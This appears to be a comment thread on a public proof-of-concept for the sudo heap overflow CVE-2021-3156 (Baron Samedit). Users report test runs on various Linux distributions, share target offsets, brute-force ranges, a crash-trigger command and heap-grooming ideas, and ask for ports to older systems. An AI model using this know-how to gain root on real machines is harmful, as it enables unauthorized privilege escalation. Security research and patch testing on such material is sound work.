Do you mind sharing your approach to find the target? Or let me know how do you set the env with all the multiple backslashes before calling sudoedit? I understand the exploit, but I don't know how to set the env for multiple \ (I mean from C yes, but for manual gdb invocation not really). Thank you.

Regarding the heap grooming, is there any chance to move from tcache to fastbins abuse?

Unfortunately too many OS are equipped with glibc < 2.26...so we won't able to leverage this exploit on them.

Thanks in advance and congrats for this amazing exploit!

Exploited successfully on Ubuntu 18.04, libc 2.27, sudo 1.8.21p2, thx!

https://datafarm-cybersecurity.medium.com/exploit-writeup-for-cve-2021-3156-sudo-baron-samedit-7a9a4282cb31

Hi
Could you give the method for the Centos 6.10 target? The latest sudo version is 1.8.6p3-29.el6 on Centos6
Hope for you reply! Thank you very much!

Hello blasty
I'm trying to make the poc work on Ubuntu 16.04 but..
first of all the nss_load_library technique doesn't work -> turns out sudoedit never tried to load any systemd.so libraries
so this made the code unusable and I'm now trying to make it work by process_getenv method.
All of the techniques used to exploit the heap overflow relied on the fact that tcache was enabled and this made early heap allocation very easy to occur, and i think this is because the tcache bin range is too wide 0x20-0x408.
Before <glibc 2.31, Tcache wasn't implemented yet.... so the heap allocation became a problem (correct me if i'm wrong) as i couldn't allocate any chunk before the (sudo_hook_entry* struct).

Do you have any idea on how to make an early allocation with fastbins? i tried to make the LC env values as small to fit into Fastbins... but everytime i break at the set_cmnd code of reading args i never saw any free [fast]/bin before the target struct...

Also i wanted to say that using pwndbg There are no free chunks containing My LC values at all,
On the contrary Ubuntu 20.04 using your exploit i saw free chunks containing the LC environments.

PS: i used the fuzzer edited by you in lockedbyte repo but i know it relies on RIP to search for exploits. but there was no heap free chunks before the struct address in the first place... and the sanity checks of free/malloc are in the way too.
If we manage to make the poc work with Ubuntu glibc version <2.31 i think all distros with old versions too will be easy to exploit
I just want the approach and i will gladly put time to try it./ or them

Thanks for your time.

A new approach was identified that should considerably simplify exploitation against sudo versions starting from 1.9.4:
https://seclists.org/oss-sec/2021/q1/88

It might be worth checking it out and implementing it in your exploit.

there is any schedule to release for older version of ubuntu ???

I'm trying to make the PoC work on a Debian 10 machine. The sudo version is the vulnerable one, as you can see on the screenshot below. But when running the PoC, it doesn't work and ask me my password to use sudo, just as if it was not vulnerable. Any idea how this could happen? I don't understand why the PoC don't work while the try with a bunch of A and the backslash works fine.

Hey,

First of all thx for your hard work! :D

I wonder if you could add a option ./sudo-hax-me-a-sandwich -b to bruteforce specific ranges from:

    .smash_len_a    = 56,
    .smash_len_b    = 54,
    .null_stomp_len = 63, 
    .lc_all_len     = 212

This way it becomes eazier to find different offsets for different os/lib versions.
After you could ask the user to send the details to this github page with os and lib information to give it more stability

Hello,

Tested on my fresh install of focal.

user@ubuntu20:~/TEST/CVE-2021-3156$ ldd --version
ldd (Ubuntu GLIBC 2.31-0ubuntu9) 2.31
Copyright (C) 2020 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

user@ubuntu20:/TEST/CVE-2021-3156$ uname -a
Linux ubuntu20 5.8.0-41-generic #4620.04.1-Ubuntu SMP Mon Jan 18 17:52:23 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

user@ubuntu20:/TEST/CVE-2021-3156$ ls
hax.c lib.c libnss_X Makefile README.md sudo-hax-me-a-sandwich
user@ubuntu20:/TEST/CVE-2021-3156$ ./sudo-hax-me-a-sandwich 0

** CVE-2021-3156 PoC by blasty [email protected]

using target: 'Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31'
** pray for your rootshell.. **
free(): invalid pointer
Aborted (core dumped)

user@ubuntu20:~/TEST/CVE-2021-3156$ cat /etc/issue
Ubuntu 20.04.1 LTS \n \l

user@ubuntu20:~/TEST/CVE-2021-3156$ /usr/bin/sudo --version
Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31

I've tested your fuzz2.py but I'not able to crash in process_hooks_getenv() or in nss_load_library()...
Only found Interesting crash in set_cmnd()...

Hi, testing in my LAB with a debian9 stretch, the bruteforce seems not working correctly

Sudo version 1.8.19p1
Sudoers policy plugin version 1.8.19p1
Sudoers file grammar version 45
Sudoers I/O plugin version 1.8.19p1
libc version 2.24-11+deb9u4

Tried with "brute.sh 90 120 50 70 150 300" and also other range, without success.
Does anybody is able to make this working for debian9?

Thanks a lot.

Hi,

Thanks for this really convenient exploit. I was able to get it working on my Debian 10 and Ubuntu 20.04 machines.

However, I noticed it failed on one of my Debian Cloud (OpenStack) virtual machines. The VM in question is running the linux-image-4.19.0-13-cloud-amd64 kernel, which is used by many cloud providers.

When I execute sudo-hax-me-a-sandwich 1 on this system, it prompts for a password, even though the user account has no sudo access and was created using --disabled-password (it has no password associated with it):

usernopass@debian10-2:~/CVE-2021-3156$ uname -a
Linux debian10-2 4.19.0-13-cloud-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64 GNU/Linux
usernopass@debian10-2:~/CVE-2021-3156$ apt policy sudo
sudo:
  Installed: 1.8.27-1+deb10u2
  Candidate: 1.8.27-1+deb10u3
  Version table:
     1.8.27-1+deb10u3 500
        500 http://security.debian.org/debian-security buster/updates/main amd64 Packages
 *** 1.8.27-1+deb10u2 500
        500 http://deb.debian.org/debian buster/main amd64 Packages
        100 /var/lib/dpkg/status
usernopass@debian10-2:~/CVE-2021-3156$ ./sudo-hax-me-a-sandwich 1

** CVE-2021-3156 PoC by blasty <[email protected]>

using target: 'Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28'
** pray for your rootshell.. **

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for usernopass:
Sorry, try again.
[sudo] password for usernopass:
sudoedit: 1 incorrect password attempt

Running the exploit from a user that does have a password also causes the prompt. When I enter the password, the message "userwithpass is not in the sudoers file. This incident will be reported." is returned. And I made sure the installed version of sudo is vulnerable; sudoedit -s '\' $(perl -e 'print "A" x 65536') causes a crash.

I tried different parameters, doesn't help

Hi

is there anyway you can make this work for suse
thanks

RHEL support pls

cat /proc/version
Linux version 2.6.32-696.el6.x86_64 ([email protected]) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-18) (GCC) ) #1 SMP Tue Feb 21 00:53:17 EST 2017

you can get ISO here
https://archive.org/details/rhel-server-6.9-x86_64-dvd

must compile with flag -std=c99

errors:
..snipp..

7f2a8cfe9000-7f2a8d030000 r-xp 00000000 08:03 1053874                    /usr/lib64/libssl3.so
7f2a8d030000-7f2a8d230000 ---p 00047000 08:03 1053874                    /usr/lib64/libssl3.so
7f2a8d230000-7f2a8d234000 r--p 00047000 08:03 1053874                    /usr/lib64/libssl3.so
7f2a8d234000-7f2a8d235000 rw-p 0004b000 08:03 1053874                    /usr/lib64/libssl3.so
7f2a8d235000-7f2a8d236000 rw-p 00000000 00:00 0 
7f2a8d236000-7f2a8d24f000 r-xp 00000000 08:03 1050994                    /usr/lib64/libsasl2.so.2.0.23
7f2a8d24f000-7f2a8d44e000 ---p 00019000 08:03 1050994                    /usr/lib64/libsasl2.so.2.0.23
7f2a8d44e000-7f2a8d44f000 r--p 00018000 08:03 1050994                    /usr/lib64/libsasl2.so.2.0.23
7f2a8d44f000-7f2a8d450000 rw-p 00019000 08:03 1050994                    /usr/lib64/libsasl2.so.2.0.23
7f2a8d450000-7f2a8d466000 r-xp 00000000 08:03 655402                     /lib64/libresolv-2.12.so
7f2a8d466000-7f2a8d666000 ---p 00016000 08:03 655402                     /lib64/libresolv-2.12.so
7f2a8d666000-7f2a8d667000 r--p 00016000 08:03 655402                     /lib64/libresolv-2.12.so
7f2a8d667000-7f2a8d668000 rw-p 00017000 08:03 655402                     /lib64/libresolv-2.12.so
7f2a8d668000-7f2a8d66a000 rw-p 00000000 00:00 0 
7f2a8d66a000-7f2a8d678000 r-xp 00000000 08:03 655585                     /lib64/liblber-2.4.so.2.10.3
7f2a8d678000-7f2a8d877000 ---p 0000e000 08:03 655585                     /lib64/liblber-2.4.so.2.10.3
7f2a8d877000-7f2a8d878000 r--p 0000d000 08:03 655585                     /lib64/liblber-2.4.so.2.10.3
7f2a8d878000-7f2a8d879000 rw-p 0000e000 08:03 655585                     /lib64/liblber-2.4.so.2.10.3Aborted

thx

this exploit is broken plz fix asap

I tried exploit on several different old Centos. Sudo is vulnerable. Exploit fails

CentOS release 6.10 Linux version 2.6.32-696
Sudo version 1.8.6p3
Sudoers policy plugin version 1.8.6p3
Sudoers file grammar version 42
Sudoers I/O plugin version 1.8.6p3
ldd (GNU libc) 2.12

sudoedit -s /
sudoedit: /: not a regular file

I'm attempting to get this exploit working on MacOS Catalina, but I'm running into the issue of not having GNU Parallel. I was wondering what changes I could make to the brute.sh script, or if there's known values for MacOS Catalina already